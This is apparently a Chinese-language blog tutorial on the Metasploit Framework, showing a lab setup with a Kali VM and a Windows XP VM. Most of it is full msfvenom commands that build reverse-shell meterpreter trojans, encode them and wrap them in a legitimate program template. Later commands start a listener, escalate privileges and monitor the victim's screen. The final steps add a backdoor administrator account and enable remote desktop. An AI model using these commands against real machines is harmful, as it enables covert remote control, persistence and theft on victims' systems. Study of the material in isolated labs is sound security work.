zl程序教程

您现在的位置是:首页 >  Java

当前栏目

Metasploit Framework

2023-02-18 16:23:30 时间

作者:Secbug

时间:20220904

说明:知识有限,如有错误,还请指出,多担待。多谷歌、Github、百度,查看官方文档。

Metasploit Framework

metasploit Framework(MSF)漏洞利用框架

目前存在free、pro版,kali自带free版metasploit框架。

msfvenom 为metasploit框架中的木马生成器模块,用于生成木马。

msfconsole 为metasploit框架中控制台模块,用于控制受害者。

msfvenom

木马生成器

可生成php、asp、jsp、jar、apk、shell、exe多种木马。

msfvenom常用选项

-l <type> 列出所有的载荷、编码器、空指令...
-p <payload> 指定载荷或自定义载荷
-f <format> 指定输出格式
-e <encoder> 指定编码器格式
-a <arch> 指定架构
-o <path> 指定输出文件
-b <list> 去除坏字节
-i <count> 指定编码次数
-x <path> 指定模板
-k 当使用模板后,程序执行后,载荷将被分离到新的线程中执行

Untitled

查看payloads

msfvenom --list payloads

Untitled

查看encoders

msfvenom --list encoders

Untitled

生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 --platform win --arch x86 -f exe -o S.exe

不同的payload,有不同的配置选项 可通过msfvenom -p payload —list-options来显示需要配置的环境

使用编码器生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -e x86/shikata_ga_nai -i 10 --platform win --arch x86 -f exe -o S.exe

使用模板生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -x ./template.exe -k --platform win --arch x86 -f exe -o S.exe

生成C代码

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -b '\x00' -f c -o shell.c

\x00在C语言字符串中表示截断,所以需要去除掉\x00 可以将代码内嵌进入其它源代码中编译,在程序运行时,主动加载运行

msfconsole

监控平台

使用方法

开启msf控制台

msfconsole

Untitled

设置监听环境

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.26.131
set LPORT 4444
exploit

Untitled

不同的模块,有不同的配置选项 可通过执行options来查看

整体流程

  1. msfvenom生成木马文件
  2. 将木马文件拷贝到受害机器
  3. 控制台设置相关参数,监听或发起连接
  4. 执行木马文件

反向shell msfvenom 需要指定攻击者方IP地址 msfconsole 需要设置攻击方IP地址 正向shell msfvenom 需要指定本地PORT,以便攻击方进行主动连接 msfconsole 需要指定受害者IP、PORT,主动连接受害者机器 两者区别:反向Shell由受害方主动发起连接,一般防火墙不会主动拦截

演示

实验环境

  1. KaLi 2022虚拟机
  2. windows XP虚拟机

实验过程中,可能需要临时关闭杀毒软件

实验过程

msfvenom生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -x ./SatGenNMEA.exe -k --platform win --arch x86 -f exe -o S.exe

Untitled

msfconsole开启监控

Untitled

发送给受害者

Untitled

点击运行

Untitled

msfconsole收到shell

Untitled

更多命令

?

Untitled

查看路径、进程列表

Untitled

权限提升(msf会尝试内置的权限提升脚本进行提权)

Untitled

查看网络进程

Untitled

后续利用

shell 获取命令行交互
upload 上传
download 下载
screenshare 监控屏幕

监控屏幕

screenshare

Untitled

添加管理员账户,开启远程桌面登录

shell
net user test test /add
net user test
net localgroup administrators test /add

Users组

Untitled

Administrators组

Untitled

远程桌面连接

受害者shell中执行

windows 家庭版可能无wmic,可以拷贝一份,利用upload上传

设置远程桌面端口
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
#开启远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
#检查端口状态
netstat -an|find "3389"
#关闭远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0

kali console执行

rdesktop 192.168.26.130

更多参考文章

  1. https://www.pa55w0rd.online/msfvenom _use/
  2. https://docs.rapid7.com/metasploit/metasploit-basics/
  3. https://blog.csdn.net/liduquan/article/details/103105886